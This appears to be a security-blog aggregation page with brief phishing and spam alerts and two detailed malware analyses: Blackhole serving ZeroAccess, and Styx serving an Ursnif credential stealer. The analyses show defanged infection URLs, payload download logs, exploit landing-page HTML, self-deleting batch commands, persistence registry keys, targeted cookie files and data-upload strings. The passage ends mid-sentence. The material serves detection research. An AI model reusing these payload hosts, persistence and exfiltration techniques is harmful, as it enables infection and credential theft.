Alert: PayPal phish

Influx of PayPal phishes this morning, 30 so far, since 09:53.

So far, whilst the subjects have been slightly varied, the href have all remained the same, with all leading to;

49paypal.com/73ecc8e60844c7b6e67fa3897b6f134d/01.php

The domain has been registered through Internet.BS, and lives at;

IP: 63.90.228.38
IP PTR: Resolution failed
ASN: 701 63.80.0.0/12 UUNET - MCI Communications

Read More

Facebook: STOP SPAMMING ME!

Everyone using Facebook will already be seeing the same thing, so nope, not a warning about Facebook Spam.

I actually detest social networking sites, the only reason I've got an account on Facebook, is for finding and investigating scams and malware on it.

Since creating the test account, there's been a flurry of spam every single day from Facebook, with the usual "you have more friends than

Read More

Blackhole of "/closest/" version with an infection of Trojan ZeroAccess (alias MaxPlus, Sirefef) w/Recycler Variant

[NEW!] New case infection w/same payload type & infection MO in different domain.
Landing page: 3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Payload: ZeroAccess
Exploit: Java: #CVE-2010-4476 #CVE-2013-0422, PDF: #CVE-2010-0188, CVE-2009-0927
Sorry for the report in text--> http://pastebin.com/raw.php?i=HPESHngh 

I am on a half way on a plane of a long trip, got many spare time so I checked some queries to malware site. I received the report to investigate a Blackhole Exploit Kit, the clue was the infected domain of 33sdfguuh.mywww.biz, I had no idea so the first try I did was requesting the domain in the urlquery and ending up with the below suspected landing page url:

33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Got so attempted so I fetched: 
--2013-02-05 21:45:24--  h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Resolving 33sdfguuh.mywww.biz... seconds 0.00, 89.253.232.149
Caching 33sdfguuh.mywww.biz => 89.253.232.149
Connecting to 33sdfguuh.mywww.biz|89.253.232.149|:80... seconds 0.00, connected.
  :
"GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0"
Referer: http://malwaremustdie.com
"Host: 33sdfguuh.mywww.biz"
  :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 12:45:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
Saving to: "209tuj2dsljdglsgjwrigslgkjskga.php"
"2013-02-05 21:45:27 (90.4 KB/s) - 209tuj2dsljdglsgjwrigslgkjskga.php saved [113594]"
The inside was the common Backhole v2.x's landing Page ofuscation, which manually cracked to be plugin detect script like this -->>[PASTEBIN] Some of the highlight are below: 
1. The usage of the pair of directories of /closest/ &  2. they don't put shellcode or the malware payload download in the landing page,     instead scattered in the exploit file infector. 3. two pdfs, two jars and one payload.
BHEK is BHEK, by using our guideline -->>[HERE] you can get these samples: FYI the 2 PDFs urls is are as per below (this is for people who got attack by these Blackhole which mostly seeing these PDF downloads URL in their log..) 
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?dsmq=30:1n:1i:1i:33&lllsxi=3g:3a:3c&bdm=30:33:1n:1m:1h:33:30:1o:30:1h&uzz=1k:1d:1f:1d:1g:1d:1f
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?qbzntsus=30:1n:1i:1i:33&cazv=39&alltb=30:33:1n:1m:1h:33:30:1o:30:1h&mkitrggt=1k:1d:1f:1d:1g:1d:1f
I started to get the payload from the smallest size of PDF, to find the JS/Evil/Code written in the 0x11AF-0x2768 section with text below: The red mark is the evil script, where the purple mark is the long  obfuscation var/array, and the yellow mark is the deobfuscator logic.  Following the usual method to decode this, we'll find the infector script burped as per first upper part below, marked area is the shellcode in text: And the lower part which having Libtiff overflow CVE-2010-0188 exploit code: *) Noted: I marked the part it checked the Adobe version.  Well shortly the shellcode will look like below, contains the payload's url: Well, I just downloaded it.. 
GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&ofa=30:33:1n:1m:1h:33:30:1o:30:1h&omtvgame=1i&tdn=trnwuek&hxx=ynkt HTTP/1.0
Referer: http://malwaremustdie.blogspot.com
User-Agent: Gottcha!
Host: 33sdfguuh.mywww.biz
 :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 13:17:33 GMT
Content-Type: application/x-msdownload
Content-Length: 176128
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Tue, 05 Feb 2013 13:17:40 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
  :
200 OK
Registered socket 1892 for persistent reuse.
Length: 176128 (172K) [application/x-msdownload]
Saving to: `contacts.exe'
2013-02-05 22:17:37 (84.9 KB/s) - `contacts.exe' saved [176128/176128]
Now we have the payload below: *)Noted: I marked my local time of my PC when I fetched.          Nothing special about the file's looks & dull-usual name of contacts.exe 
Debug investigation of the payload
So it's time to debug it to understand:  1. First the moronz encrypted the binary, see -->>[HERE]   the section .text and .data was garbled,     trailing the bins made me only stuck at the 0x40A209 in .text section: 
0x40A209  add     esi, 1Fh
0x40A20C  pushf
0x40A20D  or      word ptr [esp], 1
0x40A212  nop
0x40A213  popf
0x40A214  wait
0x40A215  push    ebp
0x40A216  wait
0x40A217  pop     ebp
0x40A218  nop
0x40A219  rep cld
0x40A21B  jb      loc_40A49D
0x40A221  pop     ds
0x40A222  pop     ds
0x40A223  cmp     dl, bh
0x40A225  push    ecx
  : (skip)
0x40A229  var_44 = word ptr -6583D684h
0x40A229  var_42 = byte ptr -6583D682h
0x40A229  var_25 = byte ptr -6583D665h
0x40A229  var_23 = byte ptr -6583D663h
   : (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40A6EF 
0x40A2F9 ; FUNCTION CHUNK AT 0x40A839 
0x40A2F9 ; FUNCTION CHUNK AT 0x40A874 
  : (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC08 
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC63 
2. Shortly I figured some mistery by debugging it to find these clue:  This mess loading DLL by using these methods.. 
LdrLoadDll
LdrGetDllHandle
Use below command to decrypt: 
uncrypted.exe
Microsoft Base Cryptographic Provider v1.0
Detecting/search the below programs / services: 
Windows Defender
wscntfy.exe
MSASCui.exe
MpCmdRun.exe
NisSrv.exe
msseces.exe
fp.exe
 :
MsMpSvc
windefend
SharedAccess
iphlpsvc
wscsvc
mpssvc
Debugged further to find that this malware stopping these processes: 
MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
PoC code in ASM here -->>[PASTEBIN]Looks also erasing/throwing off something via registry: 
RECYCLER\
$Recycle.Bin\
With some more registry traces... 
InprocServer32
{fbeb8a05-beee-4442-804e-409d6c4515e9}
\registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
  :
A nice attempt to use his filename to save itself..  
TEMP=
\InstallFlashPlayer.exe
Internet access command -1- Get GeoIP Info & safe/get CN code.. 
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
  :
geoip_country_code
If you simulate this into your browser, you'll get your all GeoIP data + lat/long coordinates.Internet access command -2- get the counter... 
GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
Host: bigfatcounters.com
User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
Connection: close
I dumped this data from memory after fetching the last URL above... ↑oh.. is an image file.. a counter↓ 
Behavior Analysis
So what was happened when I run it? It was as per below snapshot: The execution of CMD for self (copy+)deletion.. It requests the DNS query to the google, AND to these specific IP!↓ 
194.165.17.3:53  ADM-SERVICE-NET (Monaco)
66.85.130.234:53 TechEVE Ltd TE-SAFESUGAR (UK)
Except the above http, I detected UDP request to access these IP/port: 
92.254.253.254:16464
88.254.253.254:16464
87.254.253.254:16464
71.254.253.254:16464
69.254.253.254:16464
1.172.141.253:16464
122.110.95.253:16464
85.86.69.253:16464
90.230.2.2:16464
115.31.23.2:16464
174.101.87.249:16464
187.74.74.249:16464
61.86.42.249:16464
194.165.17.3:123
91.242.217.247:123
94.183.234.248:16464
180.254.253.254:16464
166.254.253.254:16464
135.254.253.254:16464
134.254.253.254:16464
119.254.253.254:16464
117.254.253.254:16464
115.254.253.254:16464
126.13.87.248:16464
89.215.205.2:16464
222.109.23.4:16464
203.171.244.4:16464
109.90.149.240:16464
173.217.73.3:16464
98.26.183.2:16464
84.55.11.24:16464
116.73.35.4:16464
86.126.1.74:16464
121.242.162.55:16464
175.181.230.42:16464
190.208.75.36:16464
150.214.68.251:16464
188.6.88.61:16464
206.254.253.254:16464
190.254.253.254:16464
182.254.253.254:16464
A short session of infection goes like this: And these are the snapshot of UDP, malform DNS requests  I was talking about: It sent the malform DNS with the request is like this: Any idea what is this, friends? :-) Furthermore let's see what's the file process & networking + registry-->>[HERE]Is a full run log on asession of one infection I made it on my PC :-) Please try to grep values like "RegSet" or "CreateFile", "UDP" to be more focus in understanding how this malware's work.  In registry there's some changes in: 
HKLM\Software\Classes\ClsId\{...some ID....}\InprocServer32\
   --→"C:\WINDOWS\system32\wbem\fastprox.dll"/"C:\RECYCLER\S-1-5-18\$6576a1a85f9fdb0e20568660563a58ee\n."
↑wow, looks like a setup for a deletion ...  Noticing the above, I just realized that my below registry keys were deleted/gone.. 
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Setup
..\System\CurrentControlSet\Services\SharedAccess\Setup\InterfacesUnfirewalledAtUpdate
..\System\CurrentControlSet\Services\wscsvc
..\System\CurrentControlSet\Services\wscsvc\Enum
..\System\CurrentControlSet\Services\wscsvc\Parameters
..\System\CurrentControlSet\Services\wscsvc\Security
Now  I know why it seeked those strings of programs in debugging, to DELETE them..  Moreover saw an a fail attempt of starting the Active Directory Domain Services Database  Mounting Tool or SERVICES_ACTIVE_DATABASE, binding to the localhost...  
What's this mess?
So we are dealing with what malware then? 1) a trojan (for sure, by all infection  MO & erasing stuffs) + staring service, but for what? I wonder what would happened if one of those request to had seccessfully established. IF it sent data then we have 2) a spyware which is having these characteristics.  Let's reseacrh further, viewing the way it made changes in registry at the  recycle keys/values made made me bumped to the good writing about ZeroAccess Recycler version here -->>[TigzyBlog]And UDP/16464 found it as the ZeroAccess/alias MaxPlus, Sirefef variant. Thank's to the Tigzy-RK for a useful writing -->Tigzy-RKAnd all of the advices I received, I thank you.  
Samples
Here's the overall samples -->>[HERE](Samples are shared for raising detection ratio & research purpose) *) Thank you to @Horgh_rce for adding the unpack version of the malware.    It's really good to know that I didn't miss a thing during debugging.  
Virus Total
Below is detection ratio as per detected moment of the samples in VT: 
Landing page : (1/46) -->>[VT]PDF1         : (20/46) -->>[VT]PDF2         : (13/46) -->>[VT]JAR1         : (6/46) -->>[VT]JAR2         : (5/46) -->>[VT]Payload      : (6/46) -->>[VT]
 
The Infection
I don't have time to check these all but all of these BHEK are infecting same ZeroAccess variant now. Marked the domain name & BHEK "/closest" path: The PoC of the list in the picture above is --->>[HERE] and here -->>[HERE]
Thank you for your help, advice & cooperation!
The trojan is the ZeroAccess recycler variant. Unpacked : 36e5a4019e41cc52247a558afc794b57
— Horgh (@Horgh_rce) February 5, 2013
And I currently trace all infected machines (a lot more then 500,000 ip) you can contact me if you want more info.
— Hugo Caron (@y0ug) February 5, 2013
Traffic on 16464/UDP - 16471/UDP is a sign of ZeroAccess trojan
— Gary Portnoy (@gxp7891) February 6, 2013
 

#MalwareMustDie!

Read More

hpHosts down

No idea why yet, but hpHosts server went down (and still at the time of writing this) around an hour or two ago.

Will post an update as soon as I know more.

/edit

As timely as always, it came back up around 5 mins after I posted this. Still trying to find out what is going on.

Read More

Info: Internet Safety Day

It's Internet Safety Day today folks, and the BBC have a "Share Take Care" campaign going, to help educate the public, on well, safety online.

Alot of people, young and old, share a raft of personal information about themselves, on social networking sites for example, without realizing the risks of doing so. Whilst unlikely to ever stop, it's time to take a more active role in helping to

Read More

The infection of Styx Exploit Kit (Landing page: painterinvoice.ru + Payload: PWS/Ursnif Variant)

Infection route:
Infector:    h00p://tropold.org/jerk.cgi?6
Redirector:  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Downloader1: h00p://painterinvoice.ru/ISRonx04zR50Jrd217..vN607Atz/getmyfile.exe?o=1&h=11
Lead to:     (same path)/imJTuXe.jar
Downloader2: h00p://painterinvoice.ru/3vzJEf0i1Ke0TEJU0NH..0mMLQ/getmyfile.exe?o=1&h=12
Payload:     h00p://fuji-solar.co.jp/date/dune.exe
Infectior hosts: 
Infector (hacked site): tropold.org       (209.8.45.242) Landing Page          : painterinvoice.ru (108.61.12.43) Payload (hacked site) : fuji-solar.co.jp  (60.43.201.33)
PoC:
Infector: 
// download

--2013-02-03 02:22:15--  h00p://tropold.org/jerk.cgi?6
Resolving tropold.org... seconds 0.00, 209.8.45.242
Caching tropold.org => 209.8.45.242
Connecting to tropold.org|209.8.45.242|:80... seconds 0.00, connected.
  :
GET /jerk.cgi?6 HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: tropold.org
  :
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 19:03:31 GMT
Server: Apache
Set-Cookie: thlpg6=_1_; expires=Sun, 03-Feb-2013 19:03:31 GMT; path=/; domain=tr
opold.org
Connection: close
Content-Type: text/html; charset=UTF-8
  :
200 OK
Length: unspecified [text/html]
Saving to: `jerk.cgi@6.1"
2013-02-03 02:22:15 (1.49 MB/s) - `jerk.cgi@6.1' saved [182]"

// cat

＜html＞＜frameset rows="100%"＞
＜frame src="h00p://painterinvoice.ru/...U0XFea"＞
＜/frameset＞
＜/html＞
Redirectors: 
// download

--2013-02-03 02:23:29--  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5
B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
  :
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
  :
HTTP/1.0 302 Found
Set-Cookie: PHPSESSID=2pt94m2itjr49i320maohs0r30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Location: h00p://painterinvoice.ru/..0fzIh0oYGU0XFea/
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:06 GMT
  :
302 Found
  :
Location: h00p://painterinvoice.ru/1yM1hP12ju..zIh0oYGU0XFea/ [following]
Skipping 0 bytes of body: [] done.
--2013-02-03 02:23:30--  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08q...2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Reusing existing connection to painterinvoice.ru:80.
  :
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/ HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
  :
HTTP/1.0 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Content-Length: 490
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:07 GMT
  :
200 OK
Length: 490 [text/html]
Saving to: `index.html"
2013-02-03 02:23:31 (13.4 MB/s) - `index.html saved [490/490]"

// cat

＜html＞
＜head＞
＜title＞TTklldd＜/title＞
＜/head＞
＜body＞
＜applet archive="imJTuXe.jar" code="kobCA.Qbyka" name="vNOArj"＞
＜param name="p" value="h00p://painterinvoice.ru/ISRonx04...607Atz/getmyfile.exe?o=1&h=11"/＞
＜/applet＞
＜script type="text/javascript" src="rtoplsf.js"＞＜/script＞
＜/body＞
＜/html＞
Downloader:
↑See the ISRonx04...607Atz/getmyfile.exe?o=1&h=11, is a downloader scheme of this exploit kit. It forward you to the JAR download url: 
h00p://painterinvoice・ru/spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar
Download... 
--2013-02-03 02:26:40--  h00p://painterinvoice.ru/spM4XE..ujSn/imJTuXe.jar
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
  :
GET /spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
  :
HTTP/1.0 200 OK
Set-Cookie: PHPSESSID=d8l9gc7g9vbg0poai41h97r7c6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Connection: close
Date: Sat, 02 Feb 2013 17:30:16 GMT
  :
200 OK
Length: unspecified [text/html]
Saving to: `imJTuXe.jar"
2013-02-03 02:26:41 (14.5 KB/s) - `imJTuXe.jar saved [12996]"
Exploitation
The target privilege: The flood: CVE-2012-1723 CVE-2012-4681 This JAR at Virus Total, URL -->>[HERE]
SHA256: ca601ec85cc7bc2afa82384a1b832401af281e476021b1db59201bb8d0936211 SHA1: e3f1b938ef96c139b948c6bd9cc69d7c2dec0643 MD5: 9c4ca2083a2c4cd518897ab59df3a15c File size: 12.7 KB ( 12996 bytes ) File name: imJTuXe.jar File type: JAR Tags: exploit jar cve-2012-1723 cve-2012-4681 Detection ratio: 10 / 46 Analysis date: 2013-02-03 08:07:39 UTC ( 2 hours, 36 minutes ago )
Malware names: 
DrWeb                    : Exploit.CVE2012-1723.13
GData                    : Java:CVE-2012-1723-VT
AntiVir                  : EXP/2012-1723.GE
TrendMicro               : HEUR_JAVA.EXEC
McAfee-GW-Edition        : Exploit-CVE2012-1723.c
Avast                    : Java:CVE-2012-1723-VT [Expl]
ESET-NOD32               : probably a variant of Java/Exploit.CVE-2012-1723.FR
McAfee                   : Exploit-CVE2012-1723.c
Ikarus                   : Java.CVE.2012
Sophos                   : Troj/JavaDl-NZ
The JAR resulted the below URL: 
h00p://painterinvoice.ru/3vzJE..(long)..0mMLQ/getmyfile.exe?o=1&h=12
Payload:
Again we met "..0mMLQ/getmyfile.exe" downloader, which now pointing to the below payload url: 
h00p://fuji-solar.co.jp/date/dune.exe
It's still up there..(make the necessary warning though...) Download log: 
GET /date/dune.exe HTTP/1.0
User-Agent: MalwareMustDie! You are famous now!
Host: fuji-solar.co.jp
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 17:20:04 GMT
Server: Rapidsite/Apa
Last-Modified: Sat, 02 Feb 2013 12:26:52 GMT
ETag: "35dd625-37400-510d060c"
Accept-Ranges: bytes
Content-Length: 226304
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/exe
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 226304 (221K) [application/exe]
"Saving to: `dune.exe"
Payload at Virus Total, url is here -->>[HERE]
SHA256: 0e61ecd0aad87a72d36bc10288303292859a800d2237ac9c32755d9e455e87e2 SHA1: a7344edd33d4bcd538fdba240c2996417a0d63b8 MD5: a26ff2a7664aaa03d41a591fc71d2221 File size: 221.0 KB ( 226304 bytes ) File name: dune.exe File type: Win32 EXE Tags: peexe Detection ratio: 3 / 46 Analysis date: 2013-02-03 07:09:05 UTC ( 38 minutes ago )
Malware Name: 
TrendMicro-HouseCall     : TROJ_GEN.F47V0202
DrWeb                    : Trojan.KillProc.22029
Symantec                 : WS.Reputation.1
↑Low detection. It looks we will see many infection happened.. I wrote the quick analysis on this malware in VT comment, with additional information below:  As per I wrote in VT comment, this malware killed explorer.exe & started the new one, as per I reproduced below:  How this malware did it? and what for? below could be the answer:  First, it creates: 1958718(RANDOM).bat in the current directory. PoC traces: 
"WriteFile","C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat",
            "SUCCESS","Offset: 0, Length: 72"
And executed it with CMD command to re-run explorer & delete the malware files: 
"Process Create","C:\WINDOWS\system32\cmd.exe","SUCCESS","PID: 2916, 
                  Command line: 
                  cmd /c """"C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat""
With the batch command below: 
(361): /sd %lu
(363): %lu.bat                     "
(364): attrib -r -s -h %%1
(365): del %%1
(366): if exist %%1 goto %u
(367): del %%0
(369): %s\explorer.exe"
This act is to hide the real malware activities and to delete the  malware files from the PC after being executed.  What had happened during the explorer.exe being terminated was: It created C:\WINDOWS\system32\fastinit.exe(RANDOM) (a self copy) & make it autostart  in registry with setting key/values: 
"CreateFile","C:\WINDOWS\system32\fastinit.exe","SUCCESS", OpenResult: Created"
"RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist(RANDOM)","SUCCESS","
   Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
NOTE: The malware choosed the name of file to be copied itself AFTER investigating what EXE files is actually exist in your PC and choosed one of them for the target to copy, PoC -->>[HERE] Furthermore the randomization also used to pick autostart registry key name, Like in this case was Windows\CurrentVersion\Run\helplist, while in VT I detected \Windows\CurrentVersion\Run\autocnfg, while VT behavior test itself shows: \Windows\CurrentVersion\Run\blassmgr.  The rest of changes in registry is as per below: 
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist","SUCCESS","Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal","SUCCESS","Type: REG_SZ, Length: 86, Data: C:\Documents and Settings\%USER%\My Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache","SUCCESS","Type: REG_SZ, Length: 140, Data: C:\Documents and Settings\%USER%\Local Settings\Temporary Internet Files"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{11948642-10a9-11e2-95b6-806d6172696f}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{903f3d4c-6ae4-11e2-91fb-0012f0e93e3e}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents","SUCCESS","Type: REG_SZ, Length: 92, Data: C:\Documents and Settings\All Users\Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop","SUCCESS","Type: REG_SZ, Length: 74, Data: C:\Documents and Settings\%USER%\%DESKTOP%"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
Since the malware binary file was encrypted so we can't see much of it, if you see the binary in the section .text it will appear like this: 
File: dune.exe; Section: .text
Encrypted part:
0x0004FF   0x0004FF     ＞====
0x000515   0x000515     ====6?y＞6?y
0x00052B   0x00052B     5=Hh2
0x000531   0x000531     2====a
0x00055B   0x00055B     c＞====
0x000582   0x000582     ＞?Ay=|=
0x0005A9   0x0005A9     Rn=y=
0x0005AF   0x0005AF     35Ln=y=
0x0005E0   0x0005E0     3＞====
0x000610   0x000610     ===g===
0x00062D   0x00062D     %,A＞h
0x000645   0x000645     a5===
0x0006BD   0x0006BD     n====g==5==
   :          :           :
0x03646F   0x03646F     R |=A3
0x03662A   0x03662A     %H2%n?
0x036642   0x036642     A57 ＞
0x03668E   0x03668E     ＞6=dg＞ 
The complete list is here -->>[HERE] but after being decrypted we start to understand how it works better. The section .rdata will appear contains the some values. We can see the list of calls is here -->>[HERE]And the breakdown of the stealer++ activities as per below:  Some comment of malware coder with the mis-spelled words: 
.rdata:100124E4 00000010 C Sart Load DLL\r\n                  
.rdata:100124F4 0000001D C Loading DLL: \"%s\" size: %d\r\n   
.rdata:10012514 00000012 C Start Write DLL\r\n                
.rdata:10012528 00000016 C DLL load status: %u\r\n            
.rdata:10012658 0000001C C Started Soccks status {%u\n}       
.rdata:10012674 00000014 C Get info status %u\n               
.rdata:10012688 00000017 C Command received \"%s\"\n          
.rdata:100126A0 0000000C C MakeScreen\n                       
So it supposed to connect to internet... 
.rdata:10012C64 00000008 C http://                       
.rdata:10012C6C 00000009 C https://                 
.rdata:10012A94 00000006 C Host:                         
.rdata:10012A9C 0000000C C User-Agent:                   
.rdata:10012AA8 00000010 C Content-Length:               
.rdata:10012AB8 00000013 C Transfer-Encoding:            
.rdata:10012BDC 0000000A C text/html                     
.rdata:10012BE8 00000006 C image                         
.rdata:10012BF0 0000000A C Referer:   
.rdata:10012BFC 0000001A C URL: %s\r\nuser=%s\r\npass=%s 
While these shows what it grabs.. (Ursnif trade mark) 
.rdata:10012CA4 00000005 C @ID@       
.rdata:10012CB0 00000008 C @GROUP@    
.rdata:10012CB8 00000007 C grabs=     
.rdata:10012CC0 00000008 C NEWGRAB    
.rdata:10012CC8 0000000B C SCREENSHOT 
.rdata:10012CD4 00000008 C PROCESS    
.rdata:10012CDC 00000007 C HIDDEN     
.rdata:10012CE4 00000005 C @%s@       
.rdata:10012CEC 00000005 C http       
.rdata:10012CF4 00000005 C POST       
.rdata:10012CFC 0000000A C URL: %s\r\n
..or this one will show you better... 
.rdata:10012948 0000001D C cmd /C \"systeminfo.exe > %s\"    
.rdata:10012968 0000001B C failed start sysinfo - %u\n       
.rdata:10012984 0000001D C cmd /C \"echo -------- >> %s\"    
.rdata:100129A4 00000021 C cmd /C \"tasklist.exe /SVC >> %s\"
.rdata:100129C8 0000001C C failed start tasklist - %u\n      
.rdata:100129E4 0000001F C cmd /C \"driverquery.exe >> %s\"  
.rdata:10012A04 0000001A C failed start driver - %u\n
.rdata:10012A20 0000005B C cmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s >> %s\
.rdata:10012A7C 00000015 C failed get reg - %u\n
The credentials targetted.... 
0x010F44   \Mozilla\Firefox\Profiles\
0x010F7C   cookies.sqlite
0x010F9C   cookies.sqlite-journal
0x010FCC   \Macromedia\Flash Player\
0x011000   *.sol
0x01100C   *.txt
0x011018   \sols
0x011024   \cookie.ie
0x01103C   \cookie.ff
0x011678   image/gif
We'll see usage of PHP form on the server side: 
.rdata:100126E8 00000005 C form
.rdata:100126F0 0000004B C /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
.rdata:10012758 0000007B C version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%08X&wake=%u&prjct=%d&arch=%u&inf=0&os=%u.%u.%u&guid=%u.%u.%u!%s!%08X 
.rdata:100127D8 0000000D C /c%s.php?%s=
        :
.rdata:10012E10 00000042 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"
.rdata:10012E58 00000048 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"
.rdata:10012EA0 00000027 C --------------------------%04x%04x%04x
.rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s
.rdata:10012EF8 0000000B C \r\n--%s--\r\n
.rdata:10012F04 00000027 C Content-Type: application/octet-stream
.rdata:10012F2C 00000011 C --%s\r\n%s\r\n%s\r\n\r\n
Setting target directory for grabbing sruff 
